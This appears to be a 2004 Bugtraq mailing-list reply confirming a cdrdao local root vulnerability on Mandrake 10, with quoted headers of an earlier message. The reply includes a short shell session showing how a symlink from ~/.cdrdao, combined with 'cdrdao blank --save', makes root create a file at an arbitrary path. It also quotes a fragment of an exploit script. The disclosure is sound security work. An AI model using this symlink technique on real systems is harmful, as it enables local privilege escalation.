In-Reply-To: <1157225765.20040907131857@xxxxxxxxxxxxxxxx> The vuln is still exist in cdrdao 1.1.9-5mdk + Mandrake 10 (beta 2). I think cdrdao should drop root permission before save the config. [newbug@localhost tmp]$ ls -al /blah ls: /blah: No such file or directory [newbug@localhost tmp]$ ln -s /blah .cdrdao [newbug@localhost tmp]$ rpm -qf `which cdrdao` cdrdao-1.1.9-5mdk [newbug@localhost tmp]$ cdrdao blank --save . . . [newbug@localhost tmp]$ ls -al /blah -rw-rw-r-- 1 root cdwriter 32 10月 2 10:41 /blah [newbug@localhost tmp]$ newbug Tseng >Received: (qmail 6527 invoked from network); 7 Sep 2004 21:09:36 -0000 >Received: from mail2.securityfocus.com (205.206.231.1) > by mail.securityfocus.com with SMTP; 7 Sep 2004 21:09:36 -0000 >Received: (qmail 13209 invoked by alias); 7 Sep 2004 21:11:52 -0000 >Delivered-To: archive-bugtraq@xxxxxxxxxxxxxxxxx >Received: (qmail 13206 invoked from network); 7 Sep 2004 21:11:52 -0000 >Received: from outgoing.securityfocus.com (HELO outgoing2.securityfocus.com) (205.206.231.26) > by mail2.securityfocus.com with SMTP; 7 Sep 2004 21:11:52 -0000 >Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20]) > by outgoing2.securityfocus.com (Postfix) with QMQP > id 4864914374E; Tue, 7 Sep 2004 09:06:54 -0600 (MDT) >Mailing-List: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm >Precedence: bulk >List-Id: <bugtraq.list-id.securityfocus.com> >List-Post: <mailto:bugtraq@xxxxxxxxxxxxxxxxx> >List-Help: <mailto:bugtraq-help@xxxxxxxxxxxxxxxxx> >List-Unsubscribe: <mailto:bugtraq-unsubscribe@xxxxxxxxxxxxxxxxx> >List-Subscribe: <mailto:bugtraq-subscribe@xxxxxxxxxxxxxxxxx> >Delivered-To: mailing list bugtraq@xxxxxxxxxxxxxxxxx >Delivered-To: moderator for bugtraq@xxxxxxxxxxxxxxxxx >Received: (qmail 26314 invoked from network); 7 Sep 2004 03:04:40 -0000 >Date: Tue, 7 Sep 2004 13:18:57 +0400 >From: 3APA3A <3APA3A@xxxxxxxxxxxxxxxx> >Reply-To: 3APA3A <3APA3A@xxxxxxxxxxxxxxxx> >Organization: http://www.security.nnov.ru >X-Priority: 3 (Normal) >Message-ID: <1157225765.20040907131857@xxxxxxxxxxxxxxxx> >To: =?Windows-1251?B?Suly9G1lIEFUSElBUw==?= <jerome.athias@xxxxxxxxxxxx> >Cc: bugtraq@xxxxxxxxxxxxxxxxx >Subject: Re: cdrdao local root exploit >In-Reply-To: <20040905191642.18379.qmail@xxxxxxxxxxxxxxxxxxxxx> >References: <20040905191642.18379.qmail@xxxxxxxxxxxxxxxxxxxxx> >MIME-Version: 1.0 >Content-Type: text/plain; charset=Windows-1251 >Content-Transfer-Encoding: 8bit > >Dear Jérôme ATHIAS, > >This bug was originally reported to Bugtraq by Andreas Mueller on >January, 15 2002 > >--Sunday, September 5, 2004, 11:16:42 PM, you wrote to bugtraq@xxxxxxxxxxxxxxxxx: > >JA> if [ ! -L $HOME/.cdrdao ];then echo "Could'n link to \$HOME/.cdrdao" > > > >-- >~/ZARAZA >Íåïðèÿòíîñòè íà÷íóòñÿ â âîñåìü. (Òâåí) > >